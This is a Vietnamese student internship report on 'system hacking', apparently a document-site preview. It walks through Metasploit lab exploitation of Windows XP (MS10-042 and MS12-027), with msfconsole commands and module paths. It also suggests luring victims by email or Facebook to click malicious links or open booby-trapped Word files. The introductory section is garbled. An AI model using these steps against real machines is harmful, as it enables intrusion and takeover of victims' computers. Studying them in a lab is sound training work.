Tải bản đầy đủ (.pdf) (31 trang)

Báo cáo thực tập system hacking

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.5 MB, 31 trang )

BÁO CÁO THỰC TẬP
SYSTEM HACKING
GVHD: Thầy Võ Đỗ Thắng
SVTT: Trần Nguyễn Lộc


MỤC LỤC
Giới thiệu

1

2

3

Thực hiện

T

Tổng Kết


Giới thiệu
• Theo thống kê của công ty Bkav, từ đầu năm 2013
đến nay, tại Việt Nam đã có 2.405 website của các
cơ quan, doanh nghiệp bị xâm nhập, trung bình
mỗi tháng có khoảng 300 website bị tấn công
• Hiện nay, các thiết bị như máy tính PC, laptop,
đều có kết nối mạng nội bộ hoặc kết nối Internet .
Trên các thiết bị này, hầu hết cài đặt các phần
mềm ứng dụng như IE, Microsoft Office, Adobe


Reader ,…. và chạy hệ điều hành như Windows
XP, Windows 7…


Giới thiệu system hacking
Gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều
hành Windows

Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông
tin, xóa những log file hệ thống

Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra
những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ
chức


Quá trình tấn công vào một hệ thống

Tóm lại, quá trình tấn công hệ
thống
(System
hacking)
là trên hệ thống
Execute
(thực
thi):
Thực
thi
ứng

dụng
Enumerate (liệt kê): Trích ra tất cả những thông tin có
bước
tiếp
theotrước
sau quá
trìnhkeylogger,
đích.trong
Chuẩn
malware,
thểmáy
về user
hệ bị
thống. Sử
dụng phương
pháp thăm
khảo
sát,
thu
thập
tin
Hide
file):để
Những
file
thực
thi,
file
soucecode
chạy

rootkit…để
nónhững
trênthông
máy
tính
tấn
dò (ẩn
SNMP
cóchạy
được
thông
tin
hữucông
ích, chính
Crack:của
Công
đoạn
này

lẽtấn
hấp
dẫn
Hackernhất.
chương
trình…
Cần
phải
được
làm
ẩnnhiều

đi, tránh
bị mục
mục
tiêu
cần
công
xác
hơn
Bước này
cầuphát
chúng
ta không
bẽ khóa
mậtlàkhẩu
tiêu
hiện
tiêu
diệt
Tracks
(dấuyêu
vết):
Tất
nhiên
phải
để lạiđăng
dấu
bằng
những
kỹ
thuật

như
nhập
của user.
Hoặc
một
cách
nàobạn
tiêu
vết.
Escalste
Những
(leo
thông
thang):
tinbằng

Nói
liên
cho
quan
dễ hiểu
đến
làkhác,
chuyển
cầnmục
phải
đổi
bị
Footprinting,
Social

phảitruy
đạt
tới là
truy
cậpgì.
vào
hệadmin
thống hoặc
giới
xóa hạn
sạch,
không
cập
để
từquyền
user
lại bất
binh
cứ thường
thứ
Nếu
lên
không
khả
engineering,
Enumeration,
user
năng
cóbạn
quyền

bị phát
caohiện
hơn là
đủkẻ
cho
độtchúng
nhập ta
là tấn
rất công
cao.
Google Hacking… đã được áp
dụng cho mục đích truy tìm
thông tin.


Hệ điều hành Backtrack 5 R3
- Backtrack là một bản phân phối dạng Live DVD của
Linux, được phát triển để thử nghiệm xâm nhập.
Backtrack là sự hợp nhất giữa 3 bản phân phối khác
nhau của Linux về thâm nhập thử nghiệm IWHAX,
WHOPPIX, và Auditor. Trong phiên bản hiện tại của
nó (5), Backtrack được dựa trên phiên bản phân phối
Linux Ubuntu 11.10.
- Backtrack 5 chứa một số công cụ có thể được sử dụng
trong quá trình thử nghiệm thâm nhập của chúng ta


Phần mềm Metasploit
• Metasploit là một dự án bảo mật máy tính cung cấp
các thông tin về vấn đề lỗ hổng bảo mật cũng như

giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
phát hiện tấn công mạng.
• Metasploit có thể chạy trên hầu hết các hệ điều hành:
Linux, Windows, MacOS.


 .Tấn công mạng Lan
Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ,
các máy tính thường kết nối với
nhau với khoảng cách vật lý
gần như trong một phòng, một
tầng, một tòa nhà, công ty, …
Các máy tính trong mạng LAN
có thể chia sẻ tài nguyên với
nhau, mà điển hình là chia sẻ
tập tin, máy in, máy quét và
một số thiết bị khác


CHUẨN BỊ

 1 máy backtrack 5 R3 có địa chỉ IP: 172.16.0.9(máy tấn
công).
 1 máy win XP có địa chỉ IP 172.16.0.10(máy bị tấn
công).


Xâm nhập và khai thác
Windows XP

Khai thác lổ hổng Ms10-042

• Nhận dạng
Lỗ hổng này có thể cho phép thực thi mã từ xa
nếu người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc
nhấp vào một liên kết thiết kế đặc biệt trong một
thông báo e-mail.


Xâm nhập và khai thác
Windows XP

• Thực hiện
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
Từ dấu nhắc sử dụng lệnh: msf > search ms10_042
Copy đường dẫn, enter gõ use “dán đường dẫn vào”
Gõ show options để thấy các options của lệnh.
msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options


 Dùng lệnh set srvhost, lhost, exploit
-

Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3

-

Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3


-

Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân.


 Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà
khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5
sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích
vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua
facebook …., tùy vào khả năng của mỗi người)


 Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy
nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file,
thư mục ….. trên máy nạn nhân.


 Xem thông tin trên máy nạn nhân

 Tạo thư mục backdoor thành công.


Xâm nhập và khai thác
Windows XP
Khai thác lổ hỗng ms12-027

a) Mô tả:
Mục tiêu của việc khai thác mã lỗi này là khai thác lỗ hổng của
Microsoft office (word ) trên window.
Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền

sử dụng giống như người dùng đăng nhập vào máy tính.


b) Các bước tấn công
 Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole.
 Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027

 Tiến hành khai thác mã lỗi bằng dòng lệnh :
use exploit /windows/fileformat/ms12_027_mscomctl_bof.
 Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027


 Tiến hành set filename và set lhost
-Lệnh set filename : tạo ra file word có chứa mã độc
-Lệnh set lhost : set địa chỉ IP của máy backtrack 5.


 Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file
word này lên máy tính nạn nhân bằng nhiều cách như email……Khi
nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn
quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được
tạo ra.


-Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển.

-Và có thể thực hiện được những lệnh tấn công khác mà mình muốn.


 Khai thác lỗ hỗng window qua mạng

internet
a) Giới thiệu Honeypot
 Honeypot là một hệ thống tài nguyên thông tin được xây dựng với
mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không
hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp
xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là
Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là
Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực
tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc
như hình thức tấn công, công cụ tấn công hay cách thức tiến hành
thay vì bị tấn công.


b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa
qua Internet


 Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:
- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại
) đóng vai trò là một Honeypot trên mạng.


c) Thực hiện khai thác mã lỗi
 Khi thác lỗi ms10_042 trong windows xp

-Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center
của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển
trên máy nạn nhân.
-Các bước tiến hành như sau:



Khởi động chương trình metasploit trên máy chủ vps .



×